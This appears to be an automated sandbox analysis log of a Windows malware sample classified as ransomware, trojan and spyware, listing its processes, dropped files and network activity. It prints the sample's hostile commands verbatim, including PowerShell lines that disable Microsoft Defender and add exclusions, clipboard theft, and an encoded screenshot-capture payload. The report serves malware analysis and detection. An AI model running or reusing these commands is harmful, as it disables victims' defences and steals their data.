    Source: README.md48.14.drString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Supported-Encodings).
    Source: README.md48.14.drString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding).
    Source: README.md48.14.drString found in binary or memory: https://github.com/bnoordhuis/node-iconv)
    Source: README.md48.14.drString found in binary or memory: https://github.com/bnoordhuis/node-iconv).
    Source: README.md48.14.drString found in binary or memory: https://github.com/danielgindi/node-autodetect-decoder-stream)
    Source: README.md48.14.drString found in binary or memory: https://github.com/expressjs/body-parser)
    Source: README.md38.14.drString found in binary or memory: https://github.com/inspect-js/has-proto/actions
    Source: node.js0.14.drString found in binary or memory: https://github.com/joyent/node/issues/1726
    Source: README.md16.14.drString found in binary or memory: https://github.com/ljharb)
    Source: README.md16.14.drString found in binary or memory: https://github.com/ljharb/es-errors/actions
    Source: sql.js.14.dr, redshift.js.14.dr, pla.js.14.dr, freemarker2.js.14.drString found in binary or memory: https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt
    Source: README.md48.14.drString found in binary or memory: https://github.com/substack/node-browserify)
    Source: README.md38.14.drString found in binary or memory: https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/inspect-js/h
    Source: README.md16.14.drString found in binary or memory: https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/ljharb/es-er
    Source: README.md16.14.drString found in binary or memory: https://img.shields.io/npm/dm/es-errors.svg
    Source: README.md38.14.drString found in binary or memory: https://img.shields.io/npm/dm/has-proto.svg
    Source: README.md16.14.drString found in binary or memory: https://img.shields.io/npm/l/es-errors.svg
    Source: README.md38.14.drString found in binary or memory: https://img.shields.io/npm/l/has-proto.svg
    Source: README.md16.14.drString found in binary or memory: https://nodei.co/npm/es-errors.png?downloads=true&stars=true
    Source: README.md38.14.drString found in binary or memory: https://nodei.co/npm/has-proto.png?downloads=true&stars=true
    Source: README.md48.14.drString found in binary or memory: https://nodei.co/npm/iconv-lite.png?downloads=true&downloadRank=true)
    Source: README.md16.14.drString found in binary or memory: https://npm-stat.com/charts.html?package=es-errors
    Source: README.md38.14.drString found in binary or memory: https://npm-stat.com/charts.html?package=has-proto
    Source: README.md16.14.drString found in binary or memory: https://npmjs.org/package/es-errors
    Source: README.md38.14.drString found in binary or memory: https://npmjs.org/package/has-proto
    Source: README.md48.14.drString found in binary or memory: https://npmjs.org/packages/iconv-lite/)
    Source: README.md16.14.drString found in binary or memory: https://tidelift.com/security
    Source: README.md48.14.drString found in binary or memory: https://travis-ci.org/ashtuchkin/iconv-lite)
    Source: README.md48.14.drString found in binary or memory: https://travis-ci.org/ashtuchkin/iconv-lite.svg?branch=master)
    Source: README.md38.14.drString found in binary or memory: https://versionbadg.es/inspect-js/has-proto.svg
    Source: README.md16.14.drString found in binary or memory: https://versionbadg.es/ljharb/es-errors.svg
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54417
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 54417 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:54417 version: TLS 1.2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
    Source: C:\agentInto\fontsessionruntime.exeWindow created: window name: CLIPBRDWNDCLASS

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NIKHQAIQAU.png
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NIKHQAIQAU.png
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\LTKMYBSEYZ.pdf
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.jpg
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ? \Common Files\Desktop\NWTVCDUMOB.jpg
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile written: C:\Windows\System32\drivers\etc\hosts
    Source: cmd.exeProcess created: 48

    System Summary

    barindex
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: Commandline size = 3647
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: Commandline size = 3647
    Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Windows\ShellComponents\tasklist.exe
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Windows\ShellComponents\d62086b577a668
    Source: Joe Sandbox ViewDropped File: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
    Source: Joe Sandbox ViewDropped File: C:\Program Files\Windows Mail\StartMenuExperienceHost.exe F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
    Source: Joe Sandbox ViewDropped File: C:\Recovery\fontdrvhost.exe F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
    Source: Joe Sandbox ViewDropped File: C:\Recovery\seCeUYjhGIFplo.exe F3EE0A31D29B515D2E0BF776507897CA3EF5605D0470ADCC4163209BA78E3445
    Source: fontsessionruntime.exe.11.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: rar.exe.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: unicodedata.pyd.13.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: zlib1.dll.14.drStatic PE information: Number of sections : 11 > 10
    Source: api-ms-win-crt-math-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.14.drStatic PE information: No import functions for PE file found
    Source: QIjBj1l8We.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
    Source: libcrypto-3.dll.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.999059198943662
    Source: libssl-3.dll.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
    Source: python312.dll.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992940650795991
    Source: sqlite3.dll.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9977444556451613
    Source: unicodedata.pyd.13.drStatic PE information: Section: UPX1 ZLIB complexity 0.9945046482974911
    Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@173/801@7/5
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe
    Source: C:\agentInto\fontsessionruntime.exeFile created: C:\Users\Default\Application Data\Microsoft\Internet Explorer\Quick Launch\tasklist.exe
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8260:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9084:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:120:WilError_03
    Source: C:\agentInto\fontsessionruntime.exeMutant created: \Sessions\1\BaseNamedObjects\Local\cd0864094e44ee75a88071e914a1d2f7650557da
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7212:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8808:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9032:120:WilError_03
    Source: C:\Users\user\AppData\Local\Temp\Built.exeMutant created: \Sessions\1\BaseNamedObjects\a
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2304:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8628:120:WilError_03
    Source: C:\agentInto\fontsessionruntime.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8956:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8064:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8828:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8680:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7900:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeFile created: C:\Users\user\AppData\Local\Temp\x12.exeJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: QIjBj1l8We.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
